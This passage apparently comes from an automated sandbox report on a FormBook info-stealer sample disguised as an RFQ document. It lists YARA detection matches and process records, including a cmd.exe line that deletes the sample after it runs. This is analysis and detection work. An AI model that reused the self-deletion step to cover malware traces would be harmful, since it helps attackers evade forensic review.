                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        Analysis Process: cmd.exe PID: 4968 Parent PID: 3536

                                                                                                                        General

                                                                                                                        Start time:11:55:55
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
                                                                                                                        Imagebase:0x190000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: conhost.exe PID: 4972 Parent PID: 4968

                                                                                                                        General

                                                                                                                        Start time:11:55:55
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >